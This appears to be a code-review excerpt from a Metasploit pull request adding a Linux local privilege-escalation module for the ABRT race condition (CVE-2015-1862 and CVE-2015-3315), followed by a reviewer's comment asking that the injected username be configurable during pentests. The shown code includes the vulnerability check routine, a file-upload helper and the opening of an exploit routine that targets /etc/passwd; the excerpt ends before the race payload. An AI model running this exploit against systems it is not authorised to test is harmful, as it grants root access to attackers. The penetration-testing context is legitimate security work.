modules/exploits/linux/local/abrt_raceabrt_priv_esc.rb

```diff
@@ -0,0 +1,189 @@
+          [ 'URL', 'http://www.openwall.com/lists/oss-security/2015/04/14/4' ],
+          [ 'URL', 'http://www.openwall.com/lists/oss-security/2015/04/16/12' ],
+          [ 'URL', 'https://github.com/abrt/abrt/commit/80408e9e24a1c10f85fd969e1853e0f192157f92' ],
+          [ 'URL', 'https://access.redhat.com/security/cve/cve-2015-1862' ],
+          [ 'URL', 'https://access.redhat.com/security/cve/cve-2015-3315' ],
+          [ 'URL', 'https://access.redhat.com/articles/1415483' ],
+          [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=1211223' ],
+          [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=1211835' ],
+          [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=1218239' ]
+        ]
+    ))
+    register_options(
+      [
+        OptInt.new('TIMEOUT', [ true, 'Race timeout (seconds)', '900' ]),
+        OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
+      ])
+  end
+
+  def base_dir
+    datastore['WritableDir']
+  end
+
+  def timeout
+    datastore['TIMEOUT']
+  end
+
+  def check
+    if cmd_exec('lsattr /etc/passwd').include? 'i'
+      vprint_error 'File /etc/passwd is immutable'
+      return CheckCode::Safe
+    end
+
+    kernel_core_pattern = cmd_exec 'grep abrt-hook-ccpp /proc/sys/kernel/core_pattern'
+    unless kernel_core_pattern.include? 'abrt-hook-ccpp'
+      vprint_error 'System is NOT configured to use ABRT for crash reporting'
+      return CheckCode::Safe
+    end
+    vprint_good 'System is configured to use ABRT for crash reporting'
+
+    if cmd_exec('[ -d /var/spool/abrt ] && echo true').include? 'true'
+      vprint_error "Directory '/var/spool/abrt' exists. System has been patched."
+      return CheckCode::Safe
+    end
+    vprint_good 'System does not appear to have been patched'
+
+    unless cmd_exec('[ -d /var/tmp/abrt ] && echo true').include? 'true'
+      vprint_error "Directory '/var/tmp/abrt' does NOT exist"
+      return CheckCode::Safe
+    end
+    vprint_good "Directory '/var/tmp/abrt' exists"
+
+    if cmd_exec('systemctl status abrt-ccpp | grep Active').include? 'inactive'
+      vprint_error 'abrt-ccp service NOT running'
+      return CheckCode::Safe
+    end
+    vprint_good 'abrt-ccpp service is running'
+
+    abrt_version = cmd_exec('yum list installed abrt | grep abrt').split(/\s+/)[1]
+    unless abrt_version.blank?
+      vprint_status "System is using ABRT package version #{abrt_version}"
+    end
+
+    CheckCode::Detected
+  end
+
+  def upload_and_chmodx(path, data)
+    print_status "Writing '#{path}' (#{data.size} bytes) ..."
+    rm_f path
+    write_file path, data
+    cmd_exec "chmod +x '#{path}'"
+    register_file_for_cleanup path
+  end
+
+  def exploit
+    if check != CheckCode::Detected
+      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
+    end
+
+    chown_file = '/etc/passwd'
+    username = rand_text_alpha rand(7..10)
```

Comment:
I'd like to see this be a non-required item.  During a pentest, it'd be good to set a static name across all exploited systems (like the pentest company name), or whatever a possible agreed upon flag may be.  If not given, rand it.